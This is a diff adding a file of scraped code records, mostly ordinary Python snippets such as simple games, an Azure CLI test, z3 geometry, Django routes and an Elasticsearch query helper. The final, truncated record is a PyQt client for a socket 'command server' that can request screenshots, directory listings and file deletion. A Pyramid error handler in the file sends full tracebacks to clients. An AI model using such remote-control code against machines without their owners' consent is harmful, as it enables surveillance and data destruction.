diff --git "a/1712.jsonl" "b/1712.jsonl" new file mode 100644--- /dev/null +++ "b/1712.jsonl" @@ -0,0 +1,669 @@ +{"seq_id":"97765736","text":"inStore = 5\n\nx = int(input(\"How many candies do you want? \"))\n\ni = 1 # start distribution\nwhile i <= x:\n if i > inStore:\n print(\"Ran out of all candies!\")\n break # come out of the loop\n print(\"Here is \" + str(i))\n i += 1\n\nfor i in range(1, 30):\n if i % 3 == 0:\n print(\"NO\")\n continue # skip the remaining statements\n print(i)\n","sub_path":"Introduction/Continue.py","file_name":"Continue.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"96721301","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\nimport os\n\nfrom azure.cli.testsdk import (\n ScenarioTest, JMESPathCheck, JMESPathCheckExists\n)\nfrom azure.cli.testsdk.base import execute\nfrom azure.cli.testsdk.preparers import AbstractPreparer\nimport azure.cli.core.azlogging as azlogging\n\nlogger = azlogging.get_az_logger(__name__)\n\n\nclass SelectNoSecClusterPreparer(AbstractPreparer):\n def __init__(self, parameter_name=\"endpoint\",\n endpoint=\"http://127.0.0.1:10550\",\n env_variable_name=\"AZURE_CLI_SF_ENDPOINT\"):\n # Name randomization unnecessary\n super(SelectNoSecClusterPreparer, self).__init__(\"test\", 10)\n self.endpoint = endpoint\n self.parameter_name = parameter_name\n self.env_variable_name = env_variable_name\n\n def create_resource(self, _, **kwargs):\n # Omit name here since there is no randomization required\n endpoint = os.environ.get(self.env_variable_name, self.endpoint)\n logger.debug(\"endpoint %s\", endpoint)\n template = \"az sf cluster select --endpoint {}\"\n execute(template.format(endpoint))\n return {self.parameter_name: endpoint}\n\n\nclass ServiceFabricTests(ScenarioTest):\n\n package_path = \"/media/share/EchoServerApplication3\"\n package_name = \"EchoServerApplication3\"\n application_type_name = \"EchoServerApp\"\n application_type_version = \"3.0\"\n application_name = \"fabric:/app1\"\n application_id = \"app1\"\n\n # Application tests\n\n @SelectNoSecClusterPreparer()\n def sf_test_application_lifecycle(self):\n self.cmd(\"az sf application upload --path {}\".format(\n self.package_path\n ))\n\n self.cmd(\n \"az sf application provision \"\n \"--application-type-build-path {}\".format(\n self.package_name\n )\n )\n\n self.cmd(\n \"az sf application type\",\n checks=[\n JMESPathCheck(\n \"items[0].name\",\n self.application_type_name\n ),\n JMESPathCheck(\n \"items[0].version\",\n self.application_type_version\n )\n ]\n )\n\n self.cmd(\n \"az sf application create \"\n \"--app-type {} --version {} --name {}\".format(\n self.application_type_name,\n self.application_type_version,\n self.application_name\n )\n )\n\n self.cmd(\n \"az sf application list\",\n checks=[\n JMESPathCheck(\"items[0].id\", self.application_id)\n ]\n )\n\n self.cmd(\n \"az sf application health \"\n \"--application-id {}\".format(self.application_id),\n checks=[\n JMESPathCheck(\"name\", self.application_name),\n JMESPathCheckExists(\"aggregatedHealthState\")\n ]\n )\n\n self.cmd(\n \"az sf application delete --application-id {}\".format(\n self.application_id\n 
)\n )\n\n self.cmd(\n \"az sf application unprovision \"\n \"--application-type-name {} \"\n \"--application-type-version {}\".format(\n self.application_type_name, self.application_type_version\n )\n )\n","sub_path":"src/command_modules/azure-cli-sf/tests/manual_sf_commands.py","file_name":"manual_sf_commands.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451499539","text":"import matplotlib.pyplot as plt\n\ndays=int(input(\"How many days do you have?\"))\nno_of_subjects=int(input(\"How many subjects to study?\"))\n\nsubjects={}\ntotal_hours=0\n\nfor i in range(no_of_subjects):\n\tname=input(\" Subject name\")\n\thours=int(input(\"Hours to study\"))\n\tsubjects[name]=hours\n\t\n\ttotal_hours=total_hours+hours\n\ndataset=[]\nxaxis=[]\n\nfor i in range(days+1,0,-1):\n\txaxis.append(str(i))\n\tif i <=2:\n\t\thours = total_hours/i\n\t\tdataset.append(hours)\n\telse:\n\t\thours = total_hours/(i)\n\t\tdataset.append(hours)\n\nif days <= 2 :\n\tstudyhours = total_hours/(days)\n\nelse:\n\tstudyhours = total_hours/(days)\n\t\t\n\thours = int(studyhours)\n\tminutes = float(studyhours*60) % 60\n\n\n\nprint(\"You need to study daily for {} hours {} minutes\".format(hours,float(minutes)))\n\nchoice=int(input(\"Press 1 to show graph\"))\n\nif choice==1:\n\n\tfor i in range(len(xaxis)):\n\t\tx=xaxis[i]\n\t\ty=dataset[i]\n\n\t\tprint(\"If you start on day {}, you need {} hours daily\".format(x,float(y)))\n\n\tplt.plot(xaxis,dataset,color=\"g\")\n\tplt.title('You have to study for:')\n\tplt.xlabel('days')\n\tplt.ylabel('Hours to study')\n\n\tplt.show()\n\n","sub_path":"daily_study_hours_linegraph.py","file_name":"daily_study_hours_linegraph.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321368281","text":"from matplotlib import pyplot as plt\nimport z3\nfrom z3 import Real, Optimize, If\nfrom fractions import Fraction\n\n\nEPS = 1e-2\n\n\ndef plotline(ax, b, e, *args):\n ax.plot([b[0], e[0]], [b[1], e[1]], *args)\n\n\ndef add_cond_on_segment(optimizer, b, e, x, y):\n optimizer.add((e[0]-b[0])*(y-b[1])-(e[1]-b[1])*(x-b[0]) == 0)\n optimizer.add(min(b[0], e[0]) <= x)\n optimizer.add(max(b[0], e[0]) >= x)\n optimizer.add(min(b[1], e[1]) <= y)\n optimizer.add(max(b[1], e[1]) >= y)\n\n\ndef add_cond_orthogonal(optimizer, lx, ly, cx, cy, rx, ry):\n optimizer.add((lx-cx)*(rx-cx)+(ly-cy)*(ry-cy) ==0)\n\n\ndef convert_py_type(ratnumtype):\n return float(ratnumtype.as_fraction())\n\n\ndef z3abs(x):\n return If(x >= 0, x, -x)\n\n\ndef search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4):\n x1 = Real('x1')\n x2 = Real('x2')\n x3 = Real('x3')\n x4 = Real('x4')\n\n y1 = Real('y1')\n y2 = Real('y2')\n y3 = Real('y3')\n y4 = Real('y4')\n\n optimizer = Optimize()\n\n add_cond_on_segment(optimizer, b1, e1, x1, y1)\n add_cond_on_segment(optimizer, b2, e2, x2, y2)\n add_cond_on_segment(optimizer, b3, e3, x3, y3)\n add_cond_on_segment(optimizer, b4, e4, x4, y4)\n\n add_cond_orthogonal(optimizer, x1, y1, x2, y2, x3, y3)\n add_cond_orthogonal(optimizer, x2, y2, x3, y3, x4, y4)\n add_cond_orthogonal(optimizer, x3, y3, x4, y4, x1, y1)\n add_cond_orthogonal(optimizer, x4, y4, x1, y1, x2, y2)\n\n # equal_distance\n #optimizer.add_soft((x2-x1)**2+(y2-y1)**2==(x4-x3)**2+(y4-y3)**2)\n #optimizer.add_soft((x3-x2)**2+(y3-y2)**2==(x4-x1)**2+(y4-y1)**2)\n\n #optimizer.maximize(z3abs((x2-x1)*(y4-y1)-(x4-x1)*(y2-y1)))\n\n result = 
optimizer.check()\n\n print(result)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plotline(ax, b1, e1)\n plotline(ax, b2, e2)\n plotline(ax, b3, e3)\n plotline(ax, b4, e4)\n\n if result != z3.unsat:\n print(optimizer.model())\n model = optimizer.model()\n x1 = convert_py_type(model[x1])\n x2 = convert_py_type(model[x2])\n x3 = convert_py_type(model[x3])\n x4 = convert_py_type(model[x4])\n y1 = convert_py_type(model[y1])\n y2 = convert_py_type(model[y2])\n y3 = convert_py_type(model[y3])\n y4 = convert_py_type(model[y4])\n\n plotline(ax, [x1, y1], [x2, y2], 'k')\n plotline(ax, [x2, y2], [x3, y3], 'k')\n plotline(ax, [x3, y3], [x4, y4], 'k')\n plotline(ax, [x4, y4], [x1, y1], 'k')\n\n else:\n print('no soltion')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n\ndef getexample1():\n b1 = [1, -1]\n e1 = [-1, 1]\n\n b2 = [-1, 2]\n e2 = [1, 4]\n\n b3 = [2, 4]\n e3 = [4, 2]\n\n b4 = [4, 1]\n e4 = [2, -1]\n search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4)\n\n\ndef getexample2():\n b1 = [-1, 0]\n e1 = [1, 0]\n\n b2 = [-2, 1]\n e2 = [-2, 3]\n\n b3 = [-1, 4]\n e3 = [1, 4]\n\n b4 = [2, 1]\n e4 = [2, 3]\n search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4)\n\n\ndef main():\n getexample2()\nif __name__ == '__main__':\n main()\n","sub_path":"optimizer/geoetryModel/inner_rect.py","file_name":"inner_rect.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180766163","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nimport json\nimport sys\nimport traceback\n\n\ndef format_traceback():\n etype, value, tb = sys.exc_info()\n ret = ''.join(traceback.format_exception(etype, value, tb))\n return '
<pre>%s</pre>' % ret\n\n\nERROR_PAGE = \"\"\"\n<head><title>An error occured</title></head>\n<p>\n<a href=\"/\">\n HOME\n</a>\n<hr/>\n</p>
\n%(error)s\n\"\"\"\n\n\n@view_config(context=Exception)\ndef internal_server_error(request):\n tb = format_traceback()\n if not request.is_xhr:\n return Response(ERROR_PAGE % {'error': tb})\n from cone.app.browser.ajax import (\n AjaxContinue,\n AjaxMessage,\n )\n continuation = AjaxContinue([AjaxMessage(tb, 'error', None)]).definitions\n ret = {\n 'mode': 'NONE',\n 'selector': 'NONE',\n 'payload': '',\n 'continuation': continuation,\n }\n response = Response(json.dumps(ret))\n response.content_type = 'application/json'\n return response\n","sub_path":"src/cone/app/browser/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"447758455","text":"from os import error\nfrom typing import Sized\nfrom sqlalchemy.sql.functions import percent_rank\nfrom elasticsearch import Elasticsearch\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport re\n\n\nES_HOST = '192.168.1.7'\nPORT = 9200\n\ndef connect_elasticsearch():\n _es_obj = Elasticsearch(hosts=ES_HOST, port=PORT, timeout=200)\n if _es_obj.ping():\n print('Connect success')\n else:\n print('Not connected!!!')\n return _es_obj\n\n\n\ndef validate_iso8601(str_val):\n is_iso8601 = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}(\\.[0-9]{1,3})?$').match\n try: \n if is_iso8601( str_val ) is not None:\n return True\n except:\n pass\n return False\n\ndef searchall(kwards): \n format_date = ['%d/%m/%Y %H:%M:%S', '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H%M%S','%d-%m-%Y %H-%M-%S',\\\n '%d%m%Y %H:%M:%S', '%d/%m/%Y %H/%M/%S', '%d/%m/%Y %H%M%S',\\\n '%Y/%m/%d %H:%M:%S','%Y-%m-%d %H:%M:%S','%Y%m%d %H:%M:%S']\n \n _es_obj = connect_elasticsearch()\n field = {}\n #_start = datetime.strptime(kwards['startTime'], '%d/%m/%Y %H:%M:%S').isoformat()\n #_stop = datetime.strptime(kwards['stopTime'], '%d/%m/%Y %H:%M:%S').isoformat()\n _start = None\n _stop = None\n if validate_iso8601(kwards['startTime']):\n _start = kwards['startTime']\n _stop = kwards['stopTime']\n \n else:\n for formater in format_date:\n try:\n datetime.strptime(kwards['startTime'], formater)\n except ValueError as e:\n continue\n else:\n _start = datetime.strptime(kwards['startTime'], formater).isoformat()\n _stop = datetime.strptime(kwards['stopTime'], formater).isoformat() \n \n if not _start or not _stop:\n return f\"{kwards['startTime']} or {kwards['stopTime']} is not reconized\"\n query = {\n \"query\":{\n \"range\":{\n \"startTime\":{\n \"gte\":_start,\n \"lte\":_stop\n }\n }\n }\n }\n \n try:\n data = _es_obj.search(index=kwards['index'],body=query, size=5000)\n except TypeError:\n return pd.DataFrame({})\n else:\n df = query_to_df(data)\n return df\n\n\ndef searchOne(kwards):\n _es_obj = connect_elasticsearch()\n field = {}\n \n format_date = ['%d/%m/%Y %H:%M:%S', '%d-%m-%Y %H:%M:%S', '%d%m%Y %H:%M:%S', \\\n '%Y/%m/%d %H:%M:%S','%Y-%m-%d %H:%M:%S','%Y%m%d %H:%M:%S']\n \n is_iso8601 = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}(\\.[0-9]{1,3})?$').match\n _number = kwards['number']\n \n if validate_iso8601(kwards['startTime']):\n _start = kwards['startTime']\n _stop = kwards['stopTime']\n else:\n for formater in format_date:\n try:\n datetime.strptime(kwards['startTime'], formater)\n except ValueError as e:\n continue\n else:\n _start = datetime.strptime(kwards['startTime'], formater).isoformat()\n \n _stop = datetime.strptime(kwards['stopTime'], formater).isoformat()\n \n query ={\n \"query\": {\n 
\"bool\": {\n \"must\": [{\n \"term\": {\n \"cust\":_number \n }\n },\n {\n \"range\": {\n \"startTime\": {\n \"gte\": _start,\n \"lt\": _stop\n }\n }\n }\n ]\n }\n }\n }\n try:\n data = _es_obj.search(index=kwards['index'],body=query, size=5000)\n except TypeError:\n return pd.DataFrame({})\n else:\n df = query_to_df(data)\n return df\n\ndef query_to_df(data):\n field = {}\n list_df = []\n for doc in data['hits']['hits']:\n source_data = doc['_source']\n for key, valu in source_data.items():\n try:\n field[key] = np.append(field[key], valu)\n except KeyError as e:\n field[key] = np.array([valu])\n \n df = pd.DataFrame(field)\n df['nBytesUp+nBytesDn'] = df['nBytesUp']+df['nBytesDn']\n print(df['nBytesUp+nBytesDn'])\n return df","sub_path":"backend/src/elasticsearch/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"167126911","text":"import collections\nimport discord\nfrom plumeria.event import bus\nfrom plumeria.message import ProxyMessage, Response\nfrom plumeria.command import commands, Command, Context, CommandError, Mapping, channel_only\nfrom plumeria.perms import server_admins_only\nfrom plumeria.storage import Session\n\n\nclass AliasManager:\n def __init__(self):\n self.aliases = collections.defaultdict(lambda: {})\n\n def load(self):\n self.aliases.clear()\n session = Session()\n try:\n for row in session.execute(\"SELECT server_id, alias, command FROM alias\").fetchall():\n server_id, alias, command = row\n self.aliases[server_id][alias] = command\n finally:\n session.close()\n\n def create(self, server, alias, command):\n alias = alias.lower()\n session = Session()\n try:\n session.execute(\"REPLACE INTO alias (server_id, alias, command) VALUES (%s, %s, %s)\",\n [server.id, alias, command])\n session.commit()\n finally:\n session.rollback()\n self.aliases[server.id][alias] = command\n\n def delete(self, server, alias):\n alias = alias.lower()\n session = Session()\n try:\n session.execute(\"DELETE FROM alias WHERE server_id = %s AND alias = %s\",\n [server.id, alias])\n session.commit()\n finally:\n session.rollback()\n if alias in self.aliases[server.id]:\n del self.aliases[server.id][alias]\n\n def match_command(self, message, command):\n if command in self.aliases[message.channel.server.id]:\n return self.aliases[message.channel.server.id][command]\n return None\n\n def get_mappings(self, server_id):\n if server_id in self.aliases:\n mappings = []\n for alias, command in self.aliases[server_id].items():\n mappings.append(\n Mapping([alias], Command(None, category=\"(Server-Specific)\", description=command, help=command)))\n return mappings\n else:\n return []\n\n\naliases = AliasManager()\n\n\n@bus.event('init')\nasync def init():\n aliases.load()\n\n\n@commands.register('echo', cost=0.2, category=\"Utility\")\nasync def echo(message):\n \"\"\"\n Simply returns the input string.\n\n Can be used to create an alias::\n\n alias website echo Our website is http://example.com\n \"\"\"\n return Response(message.content)\n\n\n@commands.register('alias', cost=4, category='Alias')\n@channel_only\n@server_admins_only\nasync def alias(message):\n \"\"\"\n Creates a new command alias.\n\n Example::\n\n alias serverinfo a2squery example.com:27015\n\n If commands need to be piped, escape the pipe symbol with a ^::\n\n alias example echo flight simulator ^| drawtext\n \"\"\"\n parts = message.content.split(\" \", 1)\n if len(parts) == 2:\n 
aliases.create(message.channel.server, parts[0], parts[1])\n await message.respond(\"Created the command alias *{}*.\".format(parts[0]))\n else:\n raise CommandError(\" \")\n\n\n@commands.register('deletealias', cost=4, category='Alias')\n@channel_only\n@server_admins_only\nasync def deletealias(message):\n \"\"\"\n Deletes an alias by name.\n \"\"\"\n if len(message.content):\n aliases.delete(message.channel.server, message.content)\n await message.respond(\"Deleted the command alias *{}*.\".format(message.content))\n else:\n raise CommandError(\"\")\n\n\n@commands.enumerator\nasync def alias_enumerator(server_id):\n if server_id:\n return aliases.get_mappings(server_id)\n else:\n return []\n\n\n@commands.intercept\nasync def alias_listener(message, value, depth):\n if not message.channel.is_private: # public channels only\n value = aliases.match_command(message, value)\n if value:\n message = ProxyMessage(message)\n message.content = value\n return await commands.execute(message, Context(), expect_prefix=False)\n return False\n","sub_path":"plumeria/plugins/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"86057008","text":"# -*-coding:utf-8 -*\n\nimport os\n\ndef init_tab():\n\ttab = []\n\tfor l in range(0, 3):\n\t\ttab.append([])\n\t\ttab[l] = [0 for i in range(0, 3)]\n\treturn tab\n\ndef ft_get_val_tab(tab):\n\tls = [0,0,0,0,0,0,0,0]\n\tfor x in range(0, 3):\n\t\tfor y in range(0, 3):\n\t\t\tls[x] += tab[x][y]\n\t\t\tls[x+3] += tab[y][x]\n\t\tls[6] += tab[x][x]\n\t\tls[7] += tab[2-x][x]\n\treturn ls\n\ndef ft_game_is_over(tab, nb_tour):\n\tcount1 = 0\n\tcount2 = 0\n\tif nb_tour > 4:\n\t\tval = ft_get_val_tab(tab)\n\t\tfor i, nb in enumerate(val):\n\t\t\tcount1 += nb - 1 if nb > 1 else 0\n\t\t\tcount2 += (-nb) - 1 if nb < -1 else 0\n\t\tprint(count1, count2, nb_tour)\n\t\tif count1 > 1:\n\t\t\treturn 1\n\t\tif count2 > 1:\n\t\t\treturn 2\n\t\tif nb_tour > 7:\n\t\t\treturn -1\n\treturn 0\n\ndef get_input_pos():\n\tpos = [-1,-1]\n\tfor i,entier in enumerate(pos):\n\t\terror = 1\n\t\twhile error == 1:\n\t\t\terror = 0\n\t\t\tr = input(\"entrer la {} sur laquel vous-voulez jouer\\n>>>\"\\\n\t\t\t\t.format(\"ligne\" if i == 0 else \"colonne\"))\n\t\t\ttry:\n\t\t\t\tpos[i] = int(r)\n\t\t\t\tif pos[i] < 1 or pos[i] > 3:\n\t\t\t\t\traise ValueError(\"le nb de la {} doit etre compris entre 1 et 3\"\\\n\t\t\t\t\t\t.format(\"ligne\" if i == 0 else \"colonne\"))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\terror = 1\n\treturn pos[0] - 1, pos[1] - 1\n\ndef ft_get_pos(tab):\n\tfree = 0\n\twhile free != 1:\n\t\tx, y = get_input_pos()\n\t\tif tab[x][y] != 0:\n\t\t\tprint(\"les coordonnée {} sont dejas prise.\\nVellez les re-saisir\"\\\n\t\t\t\t.format((x + 1, y + 1)))\n\t\telse:\n\t\t\tfree = 1\n\treturn x, y\n\ndef ft_place_coor(tab, pos, joueur1):\n\tx, y = pos\n\ttab[x][y] = 1 if joueur1 == True else -1\n\ndef ft_dysplay_tab(tab):\n\tsrc = \"\"\n\tfor i,line in enumerate(tab):\n\t\tsrc += \" - - -\\n|\"\n\t\tfor y, nb in enumerate(line):\n\t\t\tif nb == 0:\n\t\t\t\tsrc += \" |\"\n\t\t\telse :\n\t\t\t\tsrc += (\"X\" if nb == 1 else \"O\") + \"|\"\n\t\tsrc += \"\\n\"\n\tsrc += \" - - -\\n\"\n\tprint(src)\n\ndef main():\n\ttab = init_tab()\n\tjoueur1 = False\n\tgame = 0\n\tnb_tour = 0\n\twhile game == 0:\n\t\tnb_tour += 1\n\t\tjoueur1 = False if joueur1 == True else True\n\t\tprint(\"au tour du joueur {} de jouer\".format(1 if joueur1 == True else 
2))\n\t\tft_dysplay_tab(tab)\n\t\tx, y = ft_get_pos(tab)\n\t\tft_place_coor(tab, (x, y), joueur1)\n\t\tgame = ft_game_is_over(tab, nb_tour)\n\tif game < 0:\n\t\tprint(\"égalité\")\n\telse:\n\t\tprint(\"le jouer {} à gagne\".format(game))\n\tos.system(\"pause\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"projet/morpion/morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"466434564","text":"\"\"\"primer_proyecto_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.root, name='index'),\n path(\"blogs\", views.index, name=\"blogs\"),\n path(\"blogs/new\", views.new, name=\"new\"),\n path(\"blogs/create\", views.create, name=\"create\"),\n path(\"blogs/\", views.show, name=\"show\"),\n path(\"blogs//edit\", views.edit, name=\"edit\"),\n path(\"blogs//delete\", views.destroy, name=\"delete\"),\n path(\"blogs/json\", views.json, name=\"json\"),\n\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"457262966","text":"import time\nimport datetime\nimport json\n\n\nclass DBObject(object):\n \"\"\"This class defines how objects in the mongoDB should be represented.\"\"\"\n\n def __init__(\n self,\n classes=[],\n type='',\n meta={}\n ):\n self.created = datetime.datetime.now()\n self.updated = datetime.datetime.now()\n self.classes = classes\n self.type = type\n self.meta = meta\n self.structure = '{}{}'.format('#', self.__class__.__name__)\n\n\n def export(self):\n \"\"\"This function exports the object as a dict. 
This is used when\n putting an object in the database.\"\"\"\n\n return self.__dict__\n\nclass Media(DBObject):\n def __init__(\n self,\n path=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.path = path\n\nclass Option(DBObject):\n def __init__(\n self,\n key=None,\n value=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.key = key\n self.value = value\n\nclass User(DBObject):\n def __init__(\n self,\n username=None,\n email=None,\n password=None,\n media_id=None,\n description=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.username = username\n self.email = email\n self.password = password\n self.media_id = media_id\n self.description = description\n\nclass Location(DBObject):\n def __init__(\n self,\n city=None,\n name=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.city = city\n self.name = name\n\nclass Event(DBObject):\n def __init__(\n self,\n user_id=None,\n location_id=None,\n users=None,\n max_users=1,\n hour=None,\n minute=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.user_id = user_id\n self.location_id = location_id\n self.users = users\n self.max_users = max_users\n self.hour = hour\n self.minute = minute\n","sub_path":"meetndrink/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415753339","text":"import logging\nimport ujson\nfrom uuid import UUID\n\nfrom django.http import HttpRequest, HttpResponse, HttpResponseBadRequest, HttpResponseNotFound\n\n# Create your views here.\nfrom gameapi.games_manager import DoesNotExist, game_manager\nfrom gameapi.models import Game, Token, Card\n\nlogger = logging.getLogger(__name__)\n\n\ndef game_auth(fn):\n def game_auth_wrapper(request, game_id, *args, **kwargs):\n try:\n game = check_game_id(game_id)\n except DoesNotExist:\n return HttpResponseNotFound('Game does not exist')\n try:\n token_str = request.GET['token']\n except KeyError:\n return HttpResponseBadRequest('No token provided')\n try:\n token = check_token_exists(token_str)\n except Token.DoesNotExist:\n return HttpResponseBadRequest('Token invalid')\n\n if not check_token_in_game(game, token.token):\n logger.warning('Token is not part of this game. 
(%s not in %s)', token, game.players)\n return HttpResponseBadRequest('Token is not part of this game.')\n return fn(request, *args, game=game, token=token, **kwargs)\n\n return game_auth_wrapper\n\n\ndef check_game_id(game_id: UUID):\n return game_manager.get_game(game_id)\n\n\ndef check_token_exists(token: str):\n return Token.objects.get(token=token)\n\n\ndef check_token_in_game(game: Game, token: Token):\n return token in game.players\n\n\n@game_auth\ndef get_state(request: HttpRequest, game: Game, token: Token):\n logger.debug('/get_state handler')\n state = game.get_state(token.token)\n logger.debug(state)\n return HttpResponse(\n content=ujson.dumps(state),\n )\n\n\n@game_auth\ndef take_action(request: HttpRequest, game: Game, token: Token):\n logger.debug('/take_action handler')\n if 'action' not in request.GET:\n return HttpResponseBadRequest('No action provided')\n action_str = request.GET['action']\n card_str = request.GET.get(key='card', default=None)\n\n uuid = token.token\n action = Game.Action(action_str)\n card = Card.from_string(card_str) if card_str else None\n action_accepted = True\n try:\n game.take_action(uuid, action, card)\n except Game.ActionNotAllowed:\n logger.warning(\n 'Action not allowed %s %s',\n action, token,\n )\n action_accepted = False\n except Game.ActionInvalid:\n logger.warning(\n 'Action invalid %s %s',\n action, token,\n )\n action_accepted = False\n\n new_state = game.get_state(uuid)\n new_state.update({\n 'action_accepted': action_accepted,\n })\n logger.debug(new_state)\n return HttpResponse(content=ujson.dumps(new_state))\n","sub_path":"gameserver/gameapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"494392049","text":"import re\nimport os\n\n\ndef unformat(test_string, format_string):\n x = re.search('^' + format_string.format('(.*)') + '$', test_string,flags=re.DOTALL)\n return None if x is None else x.group(1)\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\nclass _Getch:\n \"\"\"\n Gets a single character from standard input. 
\n \n Does not echo to the screen.\n \"\"\"\n\n def __init__(self):\n try:\n self.impl = _GetchWindows()\n except ImportError:\n self.impl = _GetchUnix()\n\n def __call__(self): \n char = self.impl()\n if char == '\\x03':\n raise KeyboardInterrupt\n elif char == '\\x04':\n raise EOFError\n return char\n\n\n\nclass _GetchUnix:\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass _GetchWindows:\n def __init__(self):\n import msvcrt\n\n def __call__(self):\n import msvcrt\n return msvcrt.getch()\n\ngetch = _Getch()\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"488837108","text":"import os\r\nfrom Games import TicTacToe\r\nfrom File_storage import *\r\n\r\nEPSILON = 0.1\r\nSANITY_CHECK = True\r\ncwd = os.getcwd()\r\ncwd = cwd + '\\\\tensorflow_logs'\r\n\r\ndef init():\r\n # create game\r\n global game\r\n game = TicTacToe()\r\n\r\n # initialize Monte Carlo tree\r\n global mct\r\n mct = load_mct()\r\n if mct == []:\r\n mct.append(Node(game))\r\n \r\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"610274554","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtGui import *\nimport socket\n\n\nclass Window(QtGui.QMainWindow):\n\n\tdef __init__(self):\n\t\tsuper(Window, self).__init__()\n\t\tself.setGeometry(50, 50, 100, 115)\n\t\tself.setWindowTitle(\"Command server!\")\n\t\tself.setWindowIcon(QtGui.QIcon('pythonlogo.png'))\n\n\n\t\tself.my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.my_socket.connect(('127.0.0.1', 1729))\n\n\t\textractAction = QtGui.QAction(\"&Exit the app\", self)\n\t\textractAction.setShortcut(\"Ctrl+Q\")\n\t\textractAction.setStatusTip('Leave The App')\n\t\textractAction.triggered.connect(self.close_application)\n\n\t\tself.home()\n\n\tdef home(self):\n\t\tbtn = QtGui.QPushButton(\"Quit\", self)\n\t\tbtn.clicked.connect(self.close_application)\n\t\tbtn.resize(btn.minimumSizeHint())\n\t\tbtn.move(0, 80)\n\n\t\tprintScrnAction = QtGui.QAction(QtGui.QIcon('images/camera.png'), 'Print the screen', self)\n\t\tprintScrnAction.triggered.connect(self.print_screen)\n\t\tself.toolBar = self.addToolBar(\"Take a screencap\")\n\t\tself.toolBar.addAction(printScrnAction)\n\n\t\tdirAction = QtGui.QAction(QtGui.QIcon('images/folder.png'), 'Print contents of directory', self)\n\t\tdirAction.triggered.connect(self.directory)\n\t\tself.toolBar = self.addToolBar(\"Print contents of directory\")\n\t\tself.toolBar.addAction(dirAction)\n\n\t\tdeleteAction = QtGui.QAction(QtGui.QIcon('images/delete.png'), 'Deletes a file', self)\n\t\tdeleteAction.triggered.connect(self.delete)\n\t\tself.toolBar = self.addToolBar(\"Delete a 